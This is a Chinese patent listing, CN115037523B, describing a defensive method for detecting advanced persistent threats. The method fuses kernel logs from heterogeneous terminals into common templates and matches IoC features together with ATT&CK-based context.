CN115037523B - APT detection method for heterogeneous terminal log fusion - Google Patents
APT detection method for heterogeneous terminal log fusion Download PDFInfo
- Publication number
- CN115037523B CN115037523B CN202210540642.5A CN202210540642A CN115037523B CN 115037523 B CN115037523 B CN 115037523B CN 202210540642 A CN202210540642 A CN 202210540642A CN 115037523 B CN115037523 B CN 115037523B
- Authority
- CN
- China
- Prior art keywords
- log data
- event
- data
- ioc
- attack
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
- 238000001514 detection method Methods 0.000 title claims abstract description 39
- 230000004927 fusion Effects 0.000 title claims abstract description 13
- 238000000034 method Methods 0.000 claims abstract description 70
- 238000004458 analytical method Methods 0.000 description 7
- 238000004891 communication Methods 0.000 description 6
- 238000013480 data collection Methods 0.000 description 4
- 230000026676 system process Effects 0.000 description 4
- 238000006243 chemical reaction Methods 0.000 description 3
- 238000005516 engineering process Methods 0.000 description 3
- 238000004374 forensic analysis Methods 0.000 description 2
- 230000002085 persistent effect Effects 0.000 description 2
- 238000007792 addition Methods 0.000 description 1
- 230000009286 beneficial effect Effects 0.000 description 1
- 238000007405 data analysis Methods 0.000 description 1
- 230000007547 defect Effects 0.000 description 1
- 230000007774 longterm Effects 0.000 description 1
- 238000012986 modification Methods 0.000 description 1
- 230000004048 modification Effects 0.000 description 1
- 239000012466 permeate Substances 0.000 description 1
- IBBLRJGOOANPTQ-JKVLGAQCSA-N quinapril hydrochloride Chemical compound Cl.C([C@@H](C(=O)OCC)N[C@@H](C)C(=O)N1[C@@H](CC2=CC=CC=C2C1)C(O)=O)CC1=CC=CC=C1 IBBLRJGOOANPTQ-JKVLGAQCSA-N 0.000 description 1
- 230000000246 remedial effect Effects 0.000 description 1
- 238000011160 research Methods 0.000 description 1
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1408—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
- H04L63/1425—Traffic logging, e.g. anomaly detection
-
- Y—GENERAL TAGGING OF NEW TECHNOLOGICAL DEVELOPMENTS; GENERAL TAGGING OF CROSS-SECTIONAL TECHNOLOGIES SPANNING OVER SEVERAL SECTIONS OF THE IPC; TECHNICAL SUBJECTS COVERED BY FORMER USPC CROSS-REFERENCE ART COLLECTIONS [XRACs] AND DIGESTS
- Y02—TECHNOLOGIES OR APPLICATIONS FOR MITIGATION OR ADAPTATION AGAINST CLIMATE CHANGE
- Y02D—CLIMATE CHANGE MITIGATION TECHNOLOGIES IN INFORMATION AND COMMUNICATION TECHNOLOGIES [ICT], I.E. INFORMATION AND COMMUNICATION TECHNOLOGIES AIMING AT THE REDUCTION OF THEIR OWN ENERGY USE
- Y02D10/00—Energy efficient computing, e.g. low power processors, power management or thermal management
Landscapes
- Engineering & Computer Science (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Debugging And Monitoring (AREA)
Abstract
The invention discloses an APT detection method for heterogeneous terminal log fusion, which comprises the following steps: collecting log data of each heterogeneous terminal, wherein the log data comprise object log data and event log data, and the object log data comprise process object log data and file object log data; converting the collected process object log data into universal format log data based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template; and carrying out APT detection based on the log data in the universal format. The APT detection method for heterogeneous terminal log fusion meets the requirement of carrying out APT detection on multi-platform log data at the same time.
Description
Technical Field
The invention belongs to the technical field of APT attack detection, and particularly relates to an APT detection method for heterogeneous terminal log fusion.
Background
APT (Advanced Persistent Threat) attacks, i.e., advanced persistent threat attacks, generally refer to attacks launched against government, core infrastructure (e.g., energy, transportation, communications) and important industries (e.g., military, financial, medical). Compared with the traditional attack mode, the APT attack has the characteristics of long duration, long attack chain length, high concealment, multiple means, strong hazard and the like, and can be carried out by utilizing various modes such as social engineering, 0-day loopholes, infected storage media and the like. Therefore, it is difficult to directly detect a complete APT attack chain by using the existing detection method, and after an analyst detects a certain step of attack at a certain time point, the analyst rapidly locates an entry point and determines the range of attack through forensic analysis, so as to execute subsequent remedial measures. The forensic analysis generally uses a system log to record entities (such as processes, files, etc.) and information flows (such as reading, writing, creating, etc.) among the entities, and visually presents the dependency relationship among the entities in the form of a directed graph. Where the vertices of the graph are entities and the edges are information flows.
According to the research, most APT detection is only aimed at one specific terminal log, such as a Linux bottom log, a Windows log, an Android log, a traffic log and the like. However, most APT attacks cannot attack only one host, more attacks and permeates all hosts in an intranet, and the hosts in the intranet are not all the same system, so that the current APT detection method for a single terminal log cannot meet daily detection requirements gradually.
Disclosure of Invention
The invention aims to provide an APT detection method for heterogeneous terminal log fusion, which meets the requirement of carrying out APT detection on multi-platform log data at the same time.
In order to achieve the above purpose, the technical scheme adopted by the invention is as follows:
an APT detection method for heterogeneous terminal log fusion, the APT detection method for heterogeneous terminal log fusion includes:
step 1, collecting log data of each heterogeneous terminal, wherein the log data comprises object log data and event log data, and the object log data comprises process object log data and file object log data;
Step 2, converting the collected process object log data into universal format log data based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template;
Step 3, performing APT detection based on the universal format log data, including:
Step 31, ioC feature matching: taking IoC features generated by APT attack as attack sample IoC features, extracting IoC features from each piece of universal format log data, and judging the corresponding universal format log data as preliminary attack log data if the extracted IoC features are consistent with the attack sample IoC features;
Step 32, context behavior information: and extracting the context behavior information of the universal format log data which is judged to be the preliminary attack log data, judging the APT attack log data from the preliminary attack log data according to the context behavior information, and finishing APT detection.
The following provides several alternatives, but not as additional limitations to the above-described overall scheme, and only further additions or preferences, each of which may be individually combined for the above-described overall scheme, or may be combined among multiple alternatives, without technical or logical contradictions.
Preferably, the log data is kernel log data.
Preferably, the contents of the process object data template include: the unique identification number UUID, the process type, the process number cid, the parent process number parentSubject of the process, the process for permission localPrincipal, the time startTimestampNanos of process creation, the process unit ID unitID, the process unit iteration, the process unit count, the command cmdLine of process execution, the permission PRIVILEGELEVEL of the process, the loaded library importedLibraries, the imported library exportedLibraries, and the attributes properties.
Preferably, the contents of the file object data template include: the unique identification number UUID, the object type baseObject, the file type, the file descriptor fileDescriptor, the rights localPrincipal to which the file belongs, the file size, the portable execution identification peInfo (Windows), and the file hash value hashes.
Preferably, the content of the event data template includes: the unique identifier UUID, sequence number sequence, event type, subject process number threadId, subject UUID subject, object 1 unique identifier predicateObject, object 1 Path predicateObjectPath, object2 unique identifier predicateObject2, object2Path predicateObject Path, event occurrence time timestampNanos, event name names, event parameters, event location, event size, event trigger point programPoint, and attribute properties.
Preferably, if the coincidence ratio of the IoC features extracted from each piece of universal format log data and the features of the attack sample IoC is greater than a similar threshold, the extracted IoC features coincide with the features of the attack sample IoC; otherwise, do not coincide.
The APT detection method for heterogeneous terminal log fusion provided by the invention has the beneficial effects that:
1) The universal data template is designed, the log data of multiple platforms are unified, the log data of the multiple platforms can be analyzed at the same time, the universal data format enables the kernel log data of all the platforms to be stored in a unified format, and good guarantee is provided for subsequent cross-host analysis; 2) The general log data contains information which meets the requirements of APT detection and contains contextual behavior information among objects, so that APT detection can be realized by combining the contextual behavior information, and the detection accuracy is improved; 3) Each platform is based on a universal data template custom conversion method, so that the expandability is improved; 4) The method combining IoC features and contextual behavior analysis is adopted to detect APT attack, and has higher accuracy and traceability.
Drawings
Fig. 1 is a flowchart of an APT detection method for heterogeneous terminal log fusion of the present invention.
Detailed Description
The following description of the embodiments of the present invention will be made clearly and completely with reference to the accompanying drawings, in which it is apparent that the embodiments described are only some embodiments of the present invention, but not all embodiments. All other embodiments, which can be made by those skilled in the art based on the embodiments of the invention without making any inventive effort, are intended to be within the scope of the invention.
Unless defined otherwise, all technical and scientific terms used herein have the same meaning as commonly understood by one of ordinary skill in the art to which this invention belongs. The terminology used herein in the description of the invention is for the purpose of describing particular embodiments only and is not intended to be limiting of the invention.
In order to overcome the defect that multiple platforms cannot uniformly detect APT in the prior art, the embodiment provides an APT detection method for heterogeneous terminal log fusion. As shown in fig. 1, the APT detection method for heterogeneous terminal log fusion of the present embodiment includes the following steps:
Step 1, collecting log data of each heterogeneous terminal, wherein the log data comprise object log data and event log data, and the object log data comprise process object log data and file object log data.
Log data collection tool selection: because log data collection tools cannot be used commonly for different operating systems, a suitable log data collection tool needs to be selected, and the log data collection tool needs to meet the following requirements: (1) The method has the advantages that kernel log data can be acquired, the analysis of the kernel log data is not big for different platforms, if application-level log data is acquired, the data difference is big, the analysis is not facilitated, the kernel log data records good semantic information, the relation among system objects is well displayed, and the subsequent detection of APT attacks based on context behavior information is facilitated; (2) The necessary log information needs to be collected, and the collected data needs to be used for APT detection, so that the log data needs to contain appointed information such as information of processes, files, events and the like; (3) The overhead of the acquisition tool is small and therefore needs to be kept at a relatively small level in order to accommodate long-term acquisition data and analysis.
Collecting log data: starting a log data acquisition tool after starting up, closing the log data acquisition tool before shutting down, and storing the acquired log data for subsequent analysis work.
And 2, converting the collected process object log data into universal format log data (or simply universal log data) based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template.
In this embodiment, for the object log data in the kernel log data, a general data template is designed, where the general data template includes the object log information that is stored in the kernel log data of each platform, and information required for detection. For event log data in the kernel log data, necessary event information and attribute are selected to be designed into a universal data template.
The data templates designed in this embodiment are specifically as follows:
(1) Object log data: since the object log data is divided into process object log data and file object log data, which have different attributes, different data templates need to be designed.
The data structure of the process object data template is as follows:
The process object data template includes main information including a unique identification number UUID, a process type, a process number cid, a parent process number parentSubject of a process, a process use permission localPrincipal, a time startTimestampNanos of process creation, a process unit ID unitID, a process unit iteration, a process unit count, a command cmdLine of process execution, a permission PRIVILEGELEVEL (WINDOWS) of a process, a loaded library importedLibraries, an imported library exportedLibraries, an attribute properties, and the like.
The process number and the parent process number can represent parent-child relations among processes, and executed commands and attributes can be used for detecting whether suspicious operations exist.
The data structure of the file object data template is as follows:
The file object data template contains main information including a unique identification number UUID, an object type baseObject, a file type, a file descriptor fileDescriptor, rights localPrincipal to which the file belongs, a file size, a portable execution identifier peInfo (Windows), a file hash value hashes, and the like.
(2) Event log data: for event log data in the kernel log data, necessary event information and attribute are selected to be designed into a universal data template.
The data structure of the event data templates is as follows.
The event data template contains main information including a unique identifier UUID, sequence number sequence, event type, host process number threadId, host UUID subject, object 1 unique identifier predicateObject, object 1 Path predicateObjectPath, object2 unique identifier predicateObject2, object2Path predicateObject Path, event occurrence time timestampNanos, event name names, event parameters, event location, event size, event trigger point programPoint, attribute properties, and the like.
It is easy to understand that the fields in the data templates are the fields necessary for APT detection provided in this embodiment, and in other embodiments, corresponding expansion may be performed on the basis of the data templates provided in this embodiment.
According to the embodiment, based on a preset universal data template, log data collected from each heterogeneous terminal are converted into a universal data format so as to facilitate subsequent APT detection on multiple platforms at the same time, wherein the detailed steps of log data conversion are as follows:
And (3) log data analysis: and analyzing the collected log data, and extracting the fields and values required by the data template.
Log data conversion: and converting the information extracted from the log data into a universal data format based on the corresponding data template.
Example 1: the collected file object log data are converted into general format log data as follows:
"uuid":[-36,-80,31,-8,122,28,-120,63,-90,-22,-49,21,-63,124,66,63],"baseObject":{"permission":[1,36],"epoch":0,"properties":{"path":"/proc/22878/cmdline"}},"type":"FILE_OBJECT_FILE","fileDescriptor":null,"localPrincipal":null,"size":null,"peInfo":null,"hashes":null.
example 2: the collected event log data are converted into general format log data as follows:
"uuid":[-76,-108,48,44,82,93,13,-118,92,-107,33,-108,124,-57,-13,-109],"sequence":231,"type":"EVENT_EXECUTE","threadId":22354,"subject":[-126,110,103,-95,-7,119,88,-116,6,63,-121,-11,93,-26,58,59],"predicateObject":[-100,101,-87,-23,-14,37,62,122,-115,-101,82,-127,-119,-68,3,71],"predicateObjectPath":null,"predicateObject2":null,"predicateObject2Path":null,"timestampNanos":1615796054065000000,"names":null,"parameters":null,"location":null,"size":null,"programPoint":null,"properties":{}.
And step3, APT detection is carried out based on the universal format log data.
Step 31, ioC feature matching: taking IoC features generated by APT attack as features of an attack sample IoC, extracting IoC features from each piece of general format log data, and judging the corresponding general format log data as preliminary attack log data if the extracted IoC features are consistent with the features of the attack sample IoC.
Step 32, context behavior information: and extracting the context behavior information of the universal format log data which is judged to be the preliminary attack log data, judging the APT attack log data from the preliminary attack log data according to the context behavior information, and finishing APT detection.
In the embodiment, the method of combining IoC features and context behavior information is adopted to perform APT detection, the context behavior information is considered on the basis of single features, and the APT detection accuracy is remarkably improved.
The attack sample IoC features are derived from IoC features extracted from log data under the APT attack, and are used as a control group for matching. The process of extracting IoC features in this embodiment is related art, and will not be described in detail here. And IoC the process of feature matching analysis is also based on the prior art, e.g. the method disclosed in paper EXTRACTOR: extracting attack behavior from threat reports: firstly, an attack graph corresponding to the IOC characteristic (which can be formed by a general data format) is obtained, and then, matching is removed from an origin graph (which can be formed by the general data format) formed by massive logs (whether the attack graph corresponding to the IOC exists or not is seen).
In IoC feature matching, if the coincidence between the IoC features extracted from each piece of general format log data and the features of the attack sample IoC is greater than a similar threshold (for example, 0.95), the extracted IoC features coincide with the features of the attack sample IoC, namely, an attack is identified; otherwise, do not coincide.
After the log data with the attack is searched through IoC feature matching, whether the attack is the APT attack is further analyzed based on the context behavior information, so that the accuracy of APT detection is improved. When determining an APT attack through the context behavior information, based on the ATT & CK model, it is checked whether the context information of IoC features matches with a plurality of technologies in the ATT & CK model, wherein two technologies of code Execution (Execution) and information leakage (Exfiltration) must be included, and several (1 or more) other technologies represent the APT attack. The method for matching the contextual behavior information may refer to paper CONAN: A PRACTICAL REAL-time APT detection SYSTEM WITH HIGH accuracy AND EFFICIENCY, and will not be described in detail in this embodiment.
Example 1: the following attack events are assumed to occur: the Linux system process downloads files from the Windows system through network communication, and the Linux system process executes threat files to acquire rights, and sensitive data are leaked and transmitted. By analyzing IoC features, a Linux system process downloads files from a Windows system through network communication, a process log containing network communication attributes exists, the process establishes communication with an external IP, and log information for creating files and writing files is generated; the Linux system process execution threat file acquisition authority has the file which is created in the last step and creates a new process by executing a sh command or a flash command; the sensitive data leakage out has the read behavior of the process created in the previous step on the sensitive file and establishes communication with the external IP, resulting in log information of the transmitted information.
In the attack, three stages of the attack are determined through matching IoC features, when all three stages exist and are associated, the attack is determined to be an APT attack, further judgment is performed through context behavior information, and alarm feedback is performed after the APT attack is determined.
The technical features of the above-described embodiments may be arbitrarily combined, and all possible combinations of the technical features in the above-described embodiments are not described for brevity of description, however, as long as there is no contradiction between the combinations of the technical features, they should be considered as the scope of the description.
The above examples merely represent a few embodiments of the present invention, which are described in more detail and are not to be construed as limiting the scope of the invention. It should be noted that it will be apparent to those skilled in the art that several variations and modifications can be made without departing from the spirit of the invention, which are all within the scope of the invention. Accordingly, the scope of the invention should be assessed as that of the appended claims.
Claims (1)
1. The APT detection method for heterogeneous terminal log fusion is characterized by comprising the following steps of:
Step 1, collecting log data of each heterogeneous terminal, wherein the log data are kernel log data, the log data comprise object log data and event log data, and the object log data comprise process object log data and file object log data;
Step 2, converting the collected process object log data into universal format log data based on a preset process object data template, converting the collected file object log data into universal format log data based on a preset file object data template, and converting the collected event log data into universal format log data based on a preset event data template;
The content of the process object data template comprises: unique identification number UUID, process category type, process number cid, parent process number parentSubject of the process, process use right localPrincipal, time startTimestampNanos of process creation, process unit ID unitID, process unit iteration, process unit count, command cmdLine of process execution, right PRIVILEGELEVEL of the process, loaded library importedLibraries, imported library exportedLibraries, and properties;
The content of the file object data template comprises: a unique identification number UUID, an object type baseObject, a file type, a file descriptor fileDescriptor, rights localPrincipal to which the file belongs, a file size, a portable execution identifier peInfo, and a file hash value hashes;
The content of the event data template comprises: unique identification UUID, sequence number sequence, event type, subject Process number threadId, subject UUID subject, object 1 unique identification predicateObject, object 1 Path predicateObjectPath, object2 unique identification predicateObject2, object2Path predicateObject Path, event time timestampNanos, event name names, event parameters, event location, event size, event trigger point programPoint, and attributes properties;
Step 3, performing APT detection based on the universal format log data, including:
Step 31, ioC feature matching: taking IoC features generated by APT attack as attack sample IoC features, extracting IoC features from each piece of universal format log data, and judging the corresponding universal format log data as preliminary attack log data if the extracted IoC features are consistent with the attack sample IoC features; if the coincidence ratio of the IoC features extracted from each piece of universal format log data and the features of the attack sample IoC is greater than a similar threshold, the extracted IoC features are consistent with the features of the attack sample IoC; otherwise, the two images do not coincide;
Step 32, context behavior information: and extracting the context behavior information of the universal format log data which is judged to be the preliminary attack log data, judging the APT attack log data from the preliminary attack log data according to the context behavior information, and finishing APT detection.
Priority Applications (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210540642.5A CN115037523B (en) | 2022-05-17 | 2022-05-17 | APT detection method for heterogeneous terminal log fusion |
Applications Claiming Priority (1)
Application Number | Priority Date | Filing Date | Title |
---|---|---|---|
CN202210540642.5A CN115037523B (en) | 2022-05-17 | 2022-05-17 | APT detection method for heterogeneous terminal log fusion |
Publications (2)
Publication Number | Publication Date |
---|---|
CN115037523A CN115037523A (en) | 2022-09-09 |
CN115037523B true CN115037523B (en) | 2024-05-17 |
Family
ID=83121160
Family Applications (1)
Application Number | Title | Priority Date | Filing Date |
---|---|---|---|
CN202210540642.5A Active CN115037523B (en) | 2022-05-17 | 2022-05-17 | APT detection method for heterogeneous terminal log fusion |
Country Status (1)
Country | Link |
---|---|
CN (1) | CN115037523B (en) |
Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103824069A (en) * | 2014-03-19 | 2014-05-28 | 北京邮电大学 | Intrusion detection method based on multi-host-log correlation |
CN110149318A (en) * | 2019-04-26 | 2019-08-20 | 北京奇安信科技有限公司 | The processing method and processing device of mail metadata, storage medium, electronic device |
CN110188538A (en) * | 2019-04-26 | 2019-08-30 | 北京奇安信科技有限公司 | Using the method and device of sandbox cluster detection data |
CN111209570A (en) * | 2019-12-31 | 2020-05-29 | 杭州安恒信息技术股份有限公司 | Method for creating safe closed loop process based on MITER ATT & CK |
CN111259204A (en) * | 2020-01-13 | 2020-06-09 | 深圳市联软科技股份有限公司 | APT detection correlation analysis method based on graph algorithm |
CN111988341A (en) * | 2020-09-10 | 2020-11-24 | 奇安信科技集团股份有限公司 | Data processing method, device, computer system and storage medium |
Family Cites Families (1)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
US20070143842A1 (en) * | 2005-12-15 | 2007-06-21 | Turner Alan K | Method and system for acquisition and centralized storage of event logs from disparate systems |
-
2022
- 2022-05-17 CN CN202210540642.5A patent/CN115037523B/en active Active
Patent Citations (6)
Publication number | Priority date | Publication date | Assignee | Title |
---|---|---|---|---|
CN103824069A (en) * | 2014-03-19 | 2014-05-28 | 北京邮电大学 | Intrusion detection method based on multi-host-log correlation |
CN110149318A (en) * | 2019-04-26 | 2019-08-20 | 北京奇安信科技有限公司 | The processing method and processing device of mail metadata, storage medium, electronic device |
CN110188538A (en) * | 2019-04-26 | 2019-08-30 | 北京奇安信科技有限公司 | Using the method and device of sandbox cluster detection data |
CN111209570A (en) * | 2019-12-31 | 2020-05-29 | 杭州安恒信息技术股份有限公司 | Method for creating safe closed loop process based on MITER ATT & CK |
CN111259204A (en) * | 2020-01-13 | 2020-06-09 | 深圳市联软科技股份有限公司 | APT detection correlation analysis method based on graph algorithm |
CN111988341A (en) * | 2020-09-10 | 2020-11-24 | 奇安信科技集团股份有限公司 | Data processing method, device, computer system and storage medium |
Also Published As
Publication number | Publication date |
---|---|
CN115037523A (en) | 2022-09-09 |
Similar Documents
Publication | Publication Date | Title |
---|---|---|
US8881271B2 (en) | System and method for forensic identification of elements within a computer system | |
US10339315B2 (en) | Apparatus and method for detecting malicious mobile app | |
CN110688456A (en) | Vulnerability knowledge base construction method based on knowledge graph | |
CN111447215A (en) | Data detection method, device and storage medium | |
WO2010011344A1 (en) | Frame based video matching | |
CN113419960B (en) | Seed generation method and system for kernel fuzzy test of trusted operating system | |
CN113591073B (en) | Web API security threat detection method and device | |
CN110213243A (en) | A kind of industrial communication protocol conversed analysis method based on the analysis of dynamic stain | |
CN113254935A (en) | Malicious file identification method and device and storage medium | |
CN112565278A (en) | Attack capturing method and honeypot system | |
CN103166942B (en) | A kind of procotol analytic method of malicious code | |
CN115037523B (en) | APT detection method for heterogeneous terminal log fusion | |
CN116821903A (en) | Detection rule determination and malicious binary file detection method, device and medium | |
CN103701821A (en) | File type recognition method and device | |
CN110012013A (en) | A kind of virtual platform threat behavior analysis method and system based on KNN | |
CN114510717A (en) | ELF file detection method and device and storage medium | |
CN113282609A (en) | Intelligent data analysis method based on big data technology | |
CN111859896B (en) | Formula document detection method and device, computer readable medium and electronic equipment | |
CN109446809B (en) | Malicious program identification method and electronic device | |
CN112597498A (en) | Webshell detection method, system and device and readable storage medium | |
CN112765672A (en) | Malicious code detection method and device and computer readable medium | |
US10599845B2 (en) | Malicious code deactivating apparatus and method of operating the same | |
CN105786596A (en) | Method for acquiring object information from memory image file in 64-bit Windows 10 operating system | |
CN114021146B (en) | Unstructured difference patch analysis method based on value set analysis | |
CN117395080B (en) | Encryption system scanner detection method, device, electronic equipment and storage medium |
Legal Events
Date | Code | Title | Description |
---|---|---|---|
PB01 | Publication | ||
PB01 | Publication | ||
SE01 | Entry into force of request for substantive examination | ||
SE01 | Entry into force of request for substantive examination | ||
GR01 | Patent grant | ||
GR01 | Patent grant |